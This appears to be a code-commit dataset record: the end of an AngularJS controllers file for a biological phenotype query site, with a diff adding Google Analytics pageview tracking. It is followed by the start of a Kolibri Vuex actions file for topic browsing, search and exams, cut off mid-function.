$scope.itemsLimit, offset: ($scope.itemsPage - 1) * $scope.itemsLimit }, webServiceParams($scope.queryParams))); }; $scope.queryTotal = function () { $scope.itemsTotal = VariationProfileQuery.query(_.extend({total: true}, webServiceParams($scope.queryParams))); }; $scope.applyQueryFilter = function() { $scope.itemsPage = 1; $scope.queryVariationProfile(); $scope.queryTotal(); } var urlQueryParams = { taxa: [], entities: [], matchAllEntities: false, }; var taxa = []; if ($routeParams.taxa) { var taxa = angular.fromJson($routeParams.taxa); } urlQueryParams.taxa = taxa.map(function (item) { return {'@id': item}; }); $scope.queryParams = urlQueryParams; $scope.queryVariationProfile(); $scope.queryTotal(); // if (angular.isDefined(taxa)) { // urlQueryParams.taxa = taxa.map(function (item) { // return Label.query({iri: item}); // }); // } // $q.all(urlQueryParams.taxa.map(function (item) { // return item.$promise; // })).then(function (data) { // $scope.queryParams = urlQueryParams; // $scope.queryVariationProfile(); // $scope.queryTotal(); // }); }) .controller('QueryTaxaController', function ($scope, TaxonQuery, Vocab, OMN) { $scope.queryPanelOptions = { includeTaxonGroup: true, includeEntity: true, includeExpressionEntity: false }; $scope.queryParams = { taxa: [], entities: [], expressionEntities: [], matchAllEntities: false, }; $scope.maxSize = 5; $scope.itemsPage = 1; $scope.itemsLimit = 20; $scope.pageChanged = function () { $scope.queryTaxa(); } function webServiceParams(queryParams) { var result = {}; var taxa = queryParams.taxa.map(function (item) { return OMN.angled(item['@id']); }); if (taxa.length > 0) { if (queryParams.matchAllTaxa) { result.taxon = OMN.intersection(taxa); } else { result.taxon = OMN.union(taxa); } } var entities = queryParams.entities.map(function (item) { return OMN.angled(item['@id']); }); if (entities.length > 0) { if (queryParams.matchAllEntities) { result.entity = OMN.intersection(entities); } else { result.entity = OMN.union(entities); } } return result; } $scope.queryTaxa = function () { $scope.taxaResults = TaxonQuery.query(_.extend({ limit: $scope.itemsLimit, offset: ($scope.itemsPage - 1) * $scope.itemsLimit }, webServiceParams($scope.queryParams))); }; $scope.queryTotal = function () { $scope.itemsTotal = TaxonQuery.query(_.extend({total: true}, webServiceParams($scope.queryParams))); }; $scope.applyQueryFilter = function() { $scope.itemsPage = 1; $scope.queryTaxa(); $scope.queryTotal(); } $scope.queryTaxa(); $scope.queryTotal(); }) .controller('QueryGenesController', function ($scope, GeneQuery, Vocab, OMN) { $scope.queryPanelOptions = { includeTaxonGroup: false, includeEntity: true, includeExpressionEntity: false //not yet working on service side }; $scope.queryParams = { taxa: [], entities: [], expressionEntities: [], matchAllEntities: false, }; $scope.maxSize = 5; $scope.itemsPage = 1; $scope.itemsLimit = 20; $scope.pageChanged = function () { $scope.queryGenes(); } function webServiceParams(queryParams) { var result = {}; var taxa = queryParams.taxa.map(function (item) { return OMN.angled(item['@id']); }); if (taxa.length > 0) { if (queryParams.matchAllTaxa) { result.taxon = OMN.intersection(taxa); } else { result.taxon = OMN.union(taxa); } } var entities = queryParams.entities.map(function (item) { return OMN.angled(item['@id']); }); if (entities.length > 0) { if (queryParams.matchAllEntities) { result.entity = OMN.intersection(entities); } else { result.entity = OMN.union(entities); } } var expressionEntities = queryParams.expressionEntities.map(function (item) { return OMN.angled(item['@id']); }); if (expressionEntities.length > 0) { if (queryParams.matchAllExpressionEntities) { result.expression_entity = OMN.intersection(expressionEntities); } else { result.expression_entity = OMN.union(expressionEntities); } } return result; } $scope.queryGenes = function () { $scope.genesResults = GeneQuery.query(_.extend({ limit: $scope.itemsLimit, offset: ($scope.itemsPage - 1) * $scope.itemsLimit }, webServiceParams($scope.queryParams))); }; $scope.queryTotal = function () { $scope.itemsTotal = GeneQuery.query(_.extend({total: true}, webServiceParams($scope.queryParams))); }; $scope.applyQueryFilter = function() { $scope.itemsPage = 1; $scope.queryGenes(); $scope.queryTotal(); } $scope.queryGenes(); $scope.queryTotal(); }) .controller('OntoTraceController', function ($scope, OntologyTermSearch, $http, Vocab, $filter, APIroot) { $scope.ontotraceURL = null; $scope.inputType = 'simple'; $scope.ontotraceSettings = { includeParts: false, includeAllCharacters: false }; $scope.queryEntityExpression = null; $scope.queryTaxonExpression = null; $scope.$watch('queryEntityLabelExpression', function (value) { if (value) { $http.get(APIroot + '/term/resolve_label_expression', {params: {expression: value}}).then( function (response) { $scope.entityExpressionErrorMessage = null; $scope.queryEntityExpression = response.data; }, function (error) { $scope.entityExpressionErrorMessage = error.data; $scope.queryEntityExpression = null; } ); } else { $scope.queryEntityExpression = null; } }); $scope.$watch('queryTaxonLabelExpression', function (value) { if (value) { $http.get(APIroot + '/term/resolve_label_expression', {params: {expression: value}}).then( function (response) { $scope.taxonExpressionErrorMessage = null; $scope.queryTaxonExpression = response.data; }, function (error) { $scope.taxonExpressionErrorMessage = error.data; $scope.queryTaxonExpression = null; } ); } else { $scope.queryTaxonExpression = null; } }); $scope.searchTaxa = function (text) { return OntologyTermSearch.query({ limit: 20, text: text, definedBy: Vocab.VTO }).$promise.then(function (response) { return response.results; }); }; $scope.searchEntities = function (text) { return OntologyTermSearch.query({ limit: 20, text: text, definedBy: Vocab.Uberon }).$promise.then(function (response) { return response.results; }); }; function prepareTerm(term) { return $filter('encodeURI')($filter('angled')(term['@id'])); } $scope.$watchGroup(['queryEntity', 'queryTaxon', 'queryEntityExpression', 'queryTaxonExpression', 'inputType', 'ontotraceSettings.includeAllCharacters', 'ontotraceSettings.includeParts'], function (value) { if ($scope.inputType == 'simple' && $scope.queryEntity && $scope.queryTaxon) { $scope.ontotraceURL = APIroot + "/ontotrace?entity=" + prepareTerm($scope.queryEntity) + "&taxon=" + prepareTerm($scope.queryTaxon) + "&variable_only=" + !$scope.ontotraceSettings.includeAllCharacters + "&parts=" + $scope.ontotraceSettings.includeParts; } else if ($scope.inputType == 'expression' && $scope.queryEntityExpression && $scope.queryTaxonExpression) { $scope.ontotraceURL = APIroot + "/ontotrace?entity=" + $filter('encodeURI')($scope.queryEntityExpression) + "&taxon=" + $filter('encodeURI')($scope.queryTaxonExpression) + "&variable_only=" + !$scope.ontotraceSettings.includeAllCharacters + "&parts=false"; } else { $scope.ontotraceURL = null; } }); }) .controller('SimilarityController', function ($scope, $routeParams, $q, $location, Gene, GeneSearch) { $scope.searchGenes = function (text) { return GeneSearch.query({ limit: 20, text: text }).$promise.then(function (response) { return response.results; }); }; $scope.$watch('geneToQuery', function (value) { if (_.has(value, '@id')) { $location.search('gene', value['@id']); } }); if ($routeParams.gene) { Gene.query({iri: $routeParams.gene}).$promise.then(function (value) { $scope.geneToQuery = value; }); } }) .controller('QueryPanelController', function ($scope, $location, Autocomplete, OMN, Vocab, Label, $q) { $scope.queryPages = [ {label: "Taxa", href: "/query_taxa", key: "taxa"}, {label: "Character states", href: "/query_characters", key: "character_states"}, {label: "Genes", href: "/query_genes", key: "genes"}, {label: "Variation profile", href: "/query_variation_profile", key: "variation_profile"} ]; $scope.queryTaxonValues = []; $scope.queryEntityValues = []; $scope.queryExpressionEntityValues = []; $scope.selectedPage = _.findWhere($scope.queryPages, {key: $scope.configuration}); function maybeGetLabel(term) { if (!term.label && !term.$promise) { return Label.query({iri: term['@id']}).$promise; } else { return $q.when(term); } } function mapParameters() { _.defaults($scope.parameters, {taxa: [], entities: [], expressionEntities: []}); $q.all($scope.parameters.taxa.map(function (item) { return maybeGetLabel(item); })).then(function (items) { $scope.queryTaxonValues.splice(0, $scope.queryTaxonValues.length); items.forEach(function (item) { $scope.queryTaxonValues.push({term: item}); }); }); $q.all($scope.parameters.entities.map(function (item) { return maybeGetLabel(item); })).then(function (items) { $scope.queryEntityValues.splice(0, $scope.queryTaxonValues.length); items.forEach(function (item) { $scope.queryEntityValues.push({term: item}); }); }); $q.all($scope.parameters.expressionEntities.map(function (item) { return maybeGetLabel(item); })).then(function (items) { $scope.queryExpressionEntityValues.splice(0, $scope.queryTaxonValues.length); items.forEach(function (item) { $scope.queryExpressionEntityValues.push({term: item}); }); }); } function collectTerms(list) { var terms = list.filter(function (item) { return item.term; }).map(function (item) { return item.term; }); return terms; } $scope.queryParams = function () { var taxa = collectTerms($scope.queryTaxonValues); var entities = collectTerms($scope.queryEntityValues); var matchAllEntities; return { taxa: taxa, matchAllTaxa: false, entities: entities, matchAllEntities: $scope.parameters.matchAllEntities }; } $scope.searchTaxa = Autocomplete.taxa; $scope.searchEntities = Autocomplete.entities; $scope.applyQueryFilter = function () { $scope.queryDirty = false; $scope.applyQuery(); } var initiallyClean = true; $scope.$watch('queryParams() | json', function (value) { if (!initiallyClean) { $scope.queryDirty = true; } initiallyClean = false; $scope.parameters = _.extend($scope.parameters, $scope.queryParams()); }); $scope.$watch('selectedPage', function (value) { $location.path(value.href); }); $scope.$watch('parameters', function (value) { mapParameters(); }); $scope.queryDirty = false; mapParameters(); }) .controller('CommonGroupController', function ($scope, TaxonCommonGroup) { $scope.smallImage = function (iri) { if (iri) { var uuid = iri.replace("http://phylopic.org/image/", "").replace("/", ""); return "http://phylopic.org/assets/images/submissions/" + uuid + ".64.png"; } else { return ""; } }; $scope.group = TaxonCommonGroup.query({iri: $scope.taxon}); }) .controller('TaxonNameController', function ($scope, Taxon) { $scope.$watch('iri', function (value) { if ($scope.iri) { $scope.taxonInfo = Taxon.query({iri: $scope.iri}); } }); $scope.isGenusOrSpecies = function (taxon) { if (taxon) { if (taxon.rank) { return (taxon.rank['@id'] == "http://purl.obolibrary.org/obo/TAXRANK_0000005") || (taxon.rank['@id'] == "http://purl.obolibrary.org/obo/TAXRANK_0000006"); } else { return false; } } }; }) .controller('TermNameController', function ($scope, Label) { $scope.$watch('iri', function (value) { if ($scope.iri) { $scope.term = Label.query({iri: $scope.iri}); } }); }) .controller('CountedPhenotypesForTaxonController', function ($scope, TaxonPhenotypesQuery, OMN) { var params = {total: true}; params.taxon = $scope.taxon['@id']; params.entity = OMN.angled($scope.entity['@id']); params.parts = $scope.parts; params.homologs = $scope.homologs; if ($scope.quality) { params.quality = OMN.angled($scope.quality['@id']); } $scope.count = TaxonPhenotypesQuery.query(params); }) .controller('CountedPresenceOrAbsenceForTaxonController', function ($scope, EntityPresenceEvidence, EntityAbsenceEvidence, OMN) { var params = {total: true, taxon: $scope.taxon['@id'], entity: $scope.entity['@id']}; if ($scope.kind == 'presence') { $scope.count = EntityPresenceEvidence.query(params); } else { $scope.count = EntityAbsenceEvidence.query(params); } }) .controller('CharacterDescriptionAnnotationController', function ($scope, Label, PhenotypeAnnotations, CharacterDescriptionWithAnnotation) { $scope.description = CharacterDescriptionWithAnnotation.query({iri: $scope.iri}); // $scope.phenotype = Label.query({iri: $scope.iri}); $scope.eqs = PhenotypeAnnotations.query({iri: $scope.iri}); }) .controller('ClassificationController', function ($scope, $filter, Classification) { $scope.classification = Classification.query({iri: $scope.iri, definedBy: $scope.definedBy}); $scope.linkMaker = $filter($scope.linkFilter); }) .controller('SimilarityViewController', function ($scope, SimilarityMatches, SimilarityAnnotationMatches, ProfileSize, SimilarityCorpusSize) { $scope.maxSize = 3; $scope.matchesPage = 1; $scope.matchesLimit = 20; $scope.pageChanged = function () { $scope.queryTopMatches(); } $scope.matchesTotal = SimilarityCorpusSize.query({corpus_graph: $scope.corpusGraph}); //FIXME this query is too slow! //$scope.matchesTotal = {total: 1000}; $scope.queryTopMatches = function () { $scope.queryProfileSize = ProfileSize.query({iri: $scope.subject['@id']}); $scope.selectedMatch = null; $scope.topMatches = SimilarityMatches.query({ corpus_graph: $scope.corpusGraph, iri: $scope.subject['@id'], limit: $scope.matchesLimit, offset: ($scope.matchesPage - 1) * $scope.matchesLimit }); }; $scope.selectMatch = function (match) { $scope.selectedMatch = match; $scope.annotationMatches = null; $scope.selectedMatchProfileSize = ProfileSize.query({iri: match.match_profile['@id']}); $scope.annotationMatches = SimilarityAnnotationMatches.query({ corpus_graph: $scope.corpusGraph, query_graph: $scope.queryGraph, query_iri: $scope.subject['@id'], corpus_iri: match.match_profile['@id']} ); }; // $scope.selectedMatch = null; // $scope.annotationMatches = null; // $scope.queryProfileSize = null; // $scope.matchesPage = 1; // $scope.selectedMatchProfileSize = null; $scope.$watch("subject['@id']", function (value) { if (value) { $scope.queryTopMatches(); } }); }) .controller('VisualizationController', function ($scope, $q, TaxaWithPhenotype, OMN) { $scope.$watch('structures', function (newValue, oldValue) { queryNewData(); }); $scope.$watch('values', function (newValue, oldValue) { updateSpec(); }); $scope.structures = [ {'@id': "http://purl.obolibrary.org/obo/UBERON_0003097", label: "dorsal fin"}, {'@id': "http://purl.obolibrary.org/obo/UBERON_4000164", label: "caudal fin"}, {'@id': "http://purl.obolibrary.org/obo/UBERON_2000251", label: "adipose fin"}, {'@id': "http://purl.obolibrary.org/obo/UBERON_4000163", label: "anal fin"} ]; function queryNewData() { var allTaxonCounts = $scope.structures.map(function (item) { return { structure: item, result: TaxaWithPhenotype.query({ entity: OMN.angled(item['@id']), total: true})}; }); var allTaxonCountPromises = allTaxonCounts.map(function (item) { return item.result.$promise; }); $q.all(allTaxonCountPromises).then(function (data) { $scope.values = allTaxonCounts.map(function (item) { return { category: item.structure.label, amount: item.result.total }; }); }); } function updateSpec() { $scope.spec = { "width": 400, "height": 200, "padding": {"top": 10, "left": 50, "bottom": 20, "right": 10}, "data": [ { "name": "table", "values": $scope.values } ], "signals": [ { "name": "tooltip", "init": {}, "streams": [ {"type": "rect:mouseover", "expr": "datum"}, {"type": "rect:mouseout", "expr": "{}"} ] } ], "predicates": [ { "name": "tooltip", "type": "==", "operands": [{"signal": "tooltip._id"}, {"arg": "id"}] } ], "scales": [ { "name": "xscale", "type": "ordinal", "range": "width", "domain": {"data": "table", "field": "category"} }, { "name": "yscale", "range": "height", "nice": true, "domain": {"data": "table", "field": "amount"} } ], "axes": [ { "type": "x", "scale": "xscale" }, { "type": "y", "scale": "yscale" } ], "marks": [ { "type": "rect", "from": {"data":"table"}, "properties": { "enter": { "x": {"scale": "xscale", "field": "category"}, "width": {"scale": "xscale", "band": true, "offset": -1}, "y": {"scale": "yscale", "field": "amount"}, "y2": {"scale": "yscale", "value":0} }, "update": { "fill": {"value": "steelblue"} }, "hover": { "fill": {"value": "red"} } } }, { "type": "text", "properties": { "enter": { "align": {"value": "center"}, "fill": {"value": "#333"} }, "update": { "x": {"scale": "xscale", "signal": "tooltip.category"}, "dx": {"scale": "xscale", "band": true, "mult": 0.5}, "y": {"scale": "yscale", "signal": "tooltip.amount", "offset": -5}, "text": {"signal": "tooltip.amount"}, "fillOpacity": { "rule": [ { "predicate": {"name": "tooltip", "id": {"value": null}}, "value": 0 }, {"value": 1} ] } } } } ] }; } }) ;
Configure AngularJS to send URL changes to Google analytics.
js/controllers.js
Configure AngularJS to send URL changes to Google analytics.
<ide><path>s/controllers.js <ide> /* Controllers */ <ide> <ide> angular.module('pkb.controllers', ['ui.bootstrap']) <del>.controller('AppController', function ($scope, AnatomicalTermSearch, OntologyTermSearch, GeneSearch, Vocab) { <add>.controller('AppController', function ($scope, $window, $location, AnatomicalTermSearch, OntologyTermSearch, GeneSearch, Vocab) { <add> $scope.$on('$routeChangeSuccess', function() { <add> $window.ga('set', 'page', $location.url()); <add> $window.ga('send', 'pageview'); <add> console.log("route change: " + $location.url()) <add> }); <add> <ide> $scope.clickLink = function () { <ide> $scope.clearSearch(); <ide> };
JavaScript
mit
cafb73476ef024a9973e4388ec56b76e9079cf34
0
benjaoming/kolibri,benjaoming/kolibri,benjaoming/kolibri,DXCanas/kolibri,learningequality/kolibri,christianmemije/kolibri,christianmemije/kolibri,mrpau/kolibri,indirectlylit/kolibri,DXCanas/kolibri,jonboiser/kolibri,learningequality/kolibri,lyw07/kolibri,christianmemije/kolibri,learningequality/kolibri,jonboiser/kolibri,jonboiser/kolibri,lyw07/kolibri,indirectlylit/kolibri,DXCanas/kolibri,learningequality/kolibri,benjaoming/kolibri,indirectlylit/kolibri,jonboiser/kolibri,lyw07/kolibri,indirectlylit/kolibri,mrpau/kolibri,mrpau/kolibri,lyw07/kolibri,mrpau/kolibri,christianmemije/kolibri,DXCanas/kolibri
import { ContentNodeResource, ContentNodeProgressResource, UserExamResource, ExamLogResource, ExamAttemptLogResource, } from 'kolibri.resources'; import { getChannelObject, isUserLoggedIn } from 'kolibri.coreVue.vuex.getters'; import { setChannelInfo, handleApiError, samePageCheckGenerator, } from 'kolibri.coreVue.vuex.actions'; import { createQuestionList, selectQuestionFromExercise } from 'kolibri.utils.exams'; import { ContentNodeKinds } from 'kolibri.coreVue.vuex.constants'; import { PageNames } from '../../constants'; import { assessmentMetaDataState } from 'kolibri.coreVue.vuex.mappers'; import { now } from 'kolibri.utils.serverClock'; import ConditionalPromise from 'kolibri.lib.conditionalPromise'; import router from 'kolibri.coreVue.router'; import seededShuffle from 'kolibri.lib.seededshuffle'; import prepareLearnApp from '../prepareLearnApp'; import { createTranslator } from 'kolibri.utils.i18n'; const name = 'topicTreeExplorationPageTitles'; const messages = { topicsForChannelPageTitle: 'Topics - { currentChannelTitle }', currentTopicForChannelPageTitle: '{ currentTopicTitle } - { currentChannelTitle }', currentContentForChannelPageTitle: '{ currentContentTitle } - { currentChannelTitle }', contentUnavailablePageTitle: 'Content Unavailable', searchPageTitle: 'Search', examsListPageTitle: 'Exams', currentExamPageTitle: '{ currentExamTitle} - { currentChannelTitle }', }; const translator = createTranslator(name, messages); /** * Vuex State Mappers * * The methods below help map data from * the API to state in the Vuex store */ function _crumbState(ancestors) { // skip the root node return ancestors.slice(1).map(ancestor => ({ id: ancestor.pk, title: ancestor.title, })); } function validateProgress(data) { if (!data.progress_fraction) { return 0.0; } else if (data.progress_fraction > 1.0) { return 1.0; } return data.progress_fraction; } function _topicState(data, ancestors = []) { const progress = validateProgress(data); const thumbnail = data.files.find(file => file.thumbnail && file.available) || {}; const state = { id: data.pk, title: data.title, description: data.description, thumbnail: thumbnail.storage_url, breadcrumbs: _crumbState(ancestors), parent: data.parent, kind: data.pk === data.channel_id ? ContentNodeKinds.CHANNEL : data.kind, progress, channel_id: data.channel_id, }; return state; } function contentState(data, nextContent, ancestors = []) { const progress = validateProgress(data); const thumbnail = data.files.find(file => file.thumbnail && file.available) || {}; const state = { id: data.pk, title: data.title, kind: data.kind, description: data.description, thumbnail: thumbnail.storage_url, available: data.available, files: data.files, progress, breadcrumbs: _crumbState(ancestors), content_id: data.content_id, next_content: nextContent, author: data.author, license: data.license, license_description: data.license_description, license_owner: data.license_owner, parent: data.parent, lang: data.lang, channel_id: data.channel_id, }; Object.assign(state, assessmentMetaDataState(data)); return state; } function _collectionState(data) { return data.map(item => { if (item.kind === ContentNodeKinds.TOPIC) { return _topicState(item); } return contentState(item); }); } function _examState(data) { const state = { id: data.id, title: data.title, channelId: data.channel_id, active: data.active, archive: data.archive, closed: data.closed, answerCount: data.answer_count, questionCount: data.question_count, score: data.score, }; return state; } function _examLoggingState(data) { const state = { id: data.id, closed: data.closed, }; return state; } /** * Cache utility functions * * These methods are used to manipulate client side cache to reduce requests */ function updateContentNodeProgress(channelId, contentId, progressFraction) { /* * Update the progress_fraction directly on the model object, so as to prevent having * to cache bust the model (and hence the entire collection), because some progress was * made on this ContentNode. */ const model = ContentNodeResource.getModel(contentId); model.set({ progress_fraction: progressFraction }); } function setAndCheckChannels(store) { return setChannelInfo(store).then(channels => { if (!channels.length) { router.replace({ name: PageNames.CONTENT_UNAVAILABLE }); } return channels; }); } /** * Actions * * These methods are used to update client-side state */ function showChannels(store) { store.dispatch('CORE_SET_PAGE_LOADING', true); store.dispatch('SET_PAGE_NAME', PageNames.TOPICS_ROOT); setAndCheckChannels(store).then( channels => { if (!channels.length) { return; } const channelRootIds = channels.map(channel => channel.root); ContentNodeResource.getCollection({ ids: channelRootIds }).fetch().then(rootNodes => { const pageState = { rootNodes: _collectionState(rootNodes), }; store.dispatch('SET_PAGE_STATE', pageState); store.dispatch('CORE_SET_PAGE_LOADING', false); store.dispatch('CORE_SET_ERROR', null); }); }, error => { handleApiError(store, error); } ); } function showTopicsTopic(store, id, isRoot = false) { store.dispatch('CORE_SET_PAGE_LOADING', true); if (isRoot) { store.dispatch('SET_PAGE_NAME', PageNames.TOPICS_CHANNEL); } else { store.dispatch('SET_PAGE_NAME', PageNames.TOPICS_TOPIC); } const topicPromise = ContentNodeResource.getModel(id).fetch(); const childrenPromise = ContentNodeResource.getCollection({ parent: id, }).fetch(); const channelsPromise = setChannelInfo(store); const ancestorsPromise = ContentNodeResource.fetchAncestors(id); ConditionalPromise.all([topicPromise, childrenPromise, ancestorsPromise, channelsPromise]).only( samePageCheckGenerator(store), ([topic, children, ancestors]) => { const currentChannel = getChannelObject(store.state, topic.channel_id); if (!currentChannel) { router.replace({ name: PageNames.CONTENT_UNAVAILABLE }); return; } const pageState = { isRoot: isRoot, }; pageState.channel = currentChannel; pageState.topic = _topicState(topic, ancestors); const collection = _collectionState(children); pageState.contents = collection; store.dispatch('SET_PAGE_STATE', pageState); // Topics are expensive to compute progress for, so we lazily load progress for them. const subtopicIds = collection .filter(item => item.kind === ContentNodeKinds.TOPIC) .map(subtopic => subtopic.id); if (subtopicIds.length) { const topicProgressPromise = ContentNodeProgressResource.getCollection({ ids: subtopicIds, }).fetch(); topicProgressPromise.then(progressArray => { store.dispatch('SET_TOPIC_PROGRESS', progressArray); }); } store.dispatch('CORE_SET_PAGE_LOADING', false); store.dispatch('CORE_SET_ERROR', null); if (isRoot) { store.dispatch( 'CORE_SET_TITLE', translator.$tr('topicsForChannelPageTitle', { currentChannelTitle: currentChannel.title }) ); } else { store.dispatch( 'CORE_SET_TITLE', translator.$tr('currentTopicForChannelPageTitle', { currentTopicTitle: pageState.topic.title, currentChannelTitle: currentChannel.title, }) ); } }, error => { handleApiError(store, error); } ); } function showTopicsChannel(store, id) { store.dispatch('CORE_SET_PAGE_LOADING', true); store.dispatch('SET_PAGE_NAME', PageNames.TOPICS_CHANNEL); showTopicsTopic(store, id, true); } function showTopicsContent(store, id) { store.dispatch('CORE_SET_PAGE_LOADING', true); store.dispatch('SET_PAGE_NAME', PageNames.TOPICS_CONTENT); const contentPromise = ContentNodeResource.getModel(id).fetch(); const nextContentPromise = ContentNodeResource.fetchNextContent(id); const channelsPromise = setChannelInfo(store); const ancestorsPromise = ContentNodeResource.fetchAncestors(id); ConditionalPromise.all([ contentPromise, channelsPromise, nextContentPromise, ancestorsPromise, ]).only( samePageCheckGenerator(store), ([content, channels, nextContent, ancestors]) => { const currentChannel = getChannelObject(store.state, content.channel_id); if (!currentChannel) { router.replace({ name: PageNames.CONTENT_UNAVAILABLE }); return; } const pageState = { content: contentState(content, nextContent, ancestors), channel: currentChannel, }; store.dispatch('SET_PAGE_STATE', pageState); store.dispatch('CORE_SET_PAGE_LOADING', false); store.dispatch('CORE_SET_ERROR', null); store.dispatch( 'CORE_SET_TITLE', translator.$tr('currentContentForChannelPageTitle', { currentContentTitle: pageState.content.title, currentChannelTitle: currentChannel.title, }) ); }, error => { handleApiError(store, error); } ); } function triggerSearch(store, searchTerm) { if (!searchTerm) { const searchState = { searchTerm, topics: [], contents: [], }; store.dispatch('SET_PAGE_STATE', searchState); return; } const contentCollection = ContentNodeResource.getPagedCollection({ search: searchTerm }); const searchResultsPromise = contentCollection.fetch(); searchResultsPromise .then(results => { const searchState = { searchTerm }; searchState.contents = _collectionState(results); store.dispatch('SET_PAGE_STATE', searchState); store.dispatch('CORE_SET_PAGE_LOADING', false); }) .catch(error => { handleApiError(store, error); }); } function clearSearch(store) { store.dispatch('SET_PAGE_STATE', { topics: [], contents: [], searchTerm: '', }); } function showContentUnavailable(store) { store.dispatch('SET_PAGE_NAME', PageNames.CONTENT_UNAVAILABLE); store.dispatch('SET_PAGE_STATE', {}); store.dispatch('CORE_SET_PAGE_LOADING', false); store.dispatch('CORE_SET_ERROR', null); store.dispatch('CORE_SET_TITLE', translator.$tr('contentUnavailablePageTitle')); } function showSearch(store, searchTerm) { store.dispatch('SET_PAGE_NAME', PageNames.SEARCH); store.dispatch('SET_PAGE_STATE', {}); store.dispatch('CORE_SET_PAGE_LOADING', true); store.dispatch('CORE_SET_ERROR', null); store.dispatch('CORE_SET_TITLE', translator.$tr('searchPageTitle')); clearSearch(store); setAndCheckChannels(store).then(channels => { if (!channels.length) { return; } if (searchTerm) { triggerSearch(store, searchTerm); } else { store.dispatch('CORE_SET_PAGE_LOADING', false); } }); } function showExamList(store) { const userIsLoggedIn = isUserLoggedIn(store.state); store.dispatch('SET_PAGE_NAME', PageNames.EXAM_LIST); store.dispatch('CORE_SET_PAGE_LOADING', true); // if user is not logged in, this action is a noop if (!userIsLoggedIn) { store.dispatch('CORE_SET_PAGE_LOADING', false); return Promise.resolve(); } return UserExamResource.getCollection().fetch().only( samePageCheckGenerator(store), exams => { const pageState = {}; pageState.exams = exams.map(_examState); store.dispatch('SET_PAGE_STATE', pageState); store.dispatch('CORE_SET_PAGE_LOADING', false); store.dispatch('CORE_SET_ERROR', null); store.dispatch('CORE_SET_TITLE', translator.$tr('examsListPageTitle')); }, error => { handleApiError(store, error); } ); } function calcQuestionsAnswered(attemptLogs) { let questionsAnswered = 0; Object.keys(attemptLogs).forEach(key => { Object.keys(attemptLogs[key]).forEach(innerKey => { questionsAnswered += attemptLogs[key][innerKey].answer ? 1 : 0; }); }); return questionsAnswered; } function showExam(store, id, questionNumber) { if (store.state.pageName !== PageNames.EXAM) { store.dispatch('CORE_SET_PAGE_LOADING', true); store.dispatch('SET_PAGE_NAME', PageNames.EXAM); } if (!store.state.core.session.user_id) { store.dispatch('CORE_SET_ERROR', 'You must be logged in as a learner to view this page'); store.dispatch('CORE_SET_PAGE_LOADING', false); } else { questionNumber = Number(questionNumber); // eslint-disable-line no-param-reassign const examPromise = UserExamResource.getModel(id).fetch(); const examLogPromise = ExamLogResource.getCollection({ user: store.state.core.session.user_id, exam: id, }).fetch(); const examAttemptLogPromise = ExamAttemptLogResource.getCollection({ user: store.state.core.session.user_id, exam: id, }).fetch(); ConditionalPromise.all([ examPromise, examLogPromise, examAttemptLogPromise, setAndCheckChannels(store), ]).only( samePageCheckGenerator(store), ([exam, examLogs, examAttemptLogs]) => { const currentChannel = getChannelObject(store.state, exam.channel_id); if (!currentChannel) { router.replace({ name: PageNames.CONTENT_UNAVAILABLE }); return; } const attemptLogs = {}; if (store.state.core.session.user_id) { if (examLogs.length > 0 && examLogs.some(log => !log.closed)) { store.dispatch('SET_EXAM_LOG', _examLoggingState(examLogs.find(log => !log.closed))); } else { const examLogModel = ExamLogResource.createModel({ user: store.state.core.session.user_id, exam: id, closed: false, }); examLogModel.save().then(newExamLog => { store.dispatch('SET_EXAM_LOG', newExamLog); ExamLogResource.unCacheCollection({ user: store.state.core.session.user_id, exam: id, }); }); } // Sort through all the exam attempt logs retrieved and organize them into objects // keyed first by content_id and then item id under that. if (examAttemptLogs.length > 0) { examAttemptLogs.forEach(log => { if (!attemptLogs[log.content_id]) { attemptLogs[log.content_id] = {}; } attemptLogs[log.content_id][log.item] = Object.assign({}, log); }); } } const seed = exam.seed; const questionSources = exam.question_sources; // Create an array of objects with contentId and assessmentItemIndex // These will be used to select specific questions from the content node // The indices referred to shuffled positions in the content node's assessment_item_ids // property. // Wrap this all in a seededShuffle to give a consistent, repeatable shuffled order. const shuffledQuestions = seededShuffle.shuffle( createQuestionList(questionSources), seed, true ); if (!shuffledQuestions[questionNumber]) { // Illegal question number! handleError(store, `Question number ${questionNumber} is not valid for this exam`); } else { const contentPromise = ContentNodeResource.getCollection({ ids: questionSources.map(item => item.exercise_id), }).fetch(); contentPromise.only( samePageCheckGenerator(store), contentNodes => { const contentNodeMap = {}; contentNodes.forEach(node => { contentNodeMap[node.pk] = node; }); const questions = shuffledQuestions.map(question => ({ itemId: selectQuestionFromExercise( question.assessmentItemIndex, seed, contentNodeMap[question.contentId] ), contentId: question.contentId, })); if (questions.every(question => !question.itemId)) { // Exam is drawing solely on malformed exercise data, best to quit now handleError(store, `This exam has no valid questions`); } else { const itemId = questions[questionNumber].itemId; const channelId = exam.channel_id; const currentQuestion = questions[questionNumber]; const questionsAnswered = Math.max( store.state.pageState.questionsAnswered || 0, calcQuestionsAnswered(attemptLogs) ); const pageState = { exam: _examState(exam), itemId, questions, currentQuestion, questionNumber, content: contentState(contentNodeMap[questions[questionNumber].contentId]), channelId, questionsAnswered, }; if (!attemptLogs[currentQuestion.contentId]) { attemptLogs[currentQuestion.contentId] = {}; } if (!attemptLogs[currentQuestion.contentId][itemId]) { attemptLogs[currentQuestion.contentId][itemId] = { start_timestamp: now(), completion_timestamp: null, end_timestamp: null, item: itemId, complete: false, time_spent: 0, correct: 0, answer: null, simple_answer: '', interaction_history: [], hinted: false, channel_id: channelId, content_id: currentQuestion.contentId, }; } pageState.currentAttempt = attemptLogs[currentQuestion.contentId][itemId]; store.dispatch('SET_EXAM_ATTEMPT_LOGS', attemptLogs); store.dispatch('SET_PAGE_STATE', pageState); store.dispatch('CORE_SET_PAGE_LOADING', false); store.dispatch('CORE_SET_ERROR', null); store.dispatch( 'CORE_SET_TITLE', translator.$tr('currentExamPageTitle', { currentExamTitle: pageState.exam.title, currentChannelTitle: currentChannel.title, }) ); } }, error => { handleApiError(store, error); } ); } }, error => { handleApiError(store, error); } ); } } function setAndSaveCurrentExamAttemptLog(store, contentId, itemId, currentAttemptLog) { // As soon as this has happened, we should clear any previous cache for the // UserExamResource - as that data has now changed. UserExamResource.clearCache(); store.dispatch('SET_EXAM_ATTEMPT_LOGS', { // prettier-ignore [contentId]: ({ [itemId]: currentAttemptLog, }), }); const pageState = Object.assign(store.state.pageState); pageState.currentAttempt = currentAttemptLog; store.dispatch('SET_PAGE_STATE', pageState); // If a save has already been fired for this particular attempt log, // it may not have an id yet, so we can look for it by its uniquely // identifying fields, contentId and itemId. let examAttemptLogModel = ExamAttemptLogResource.findModel({ 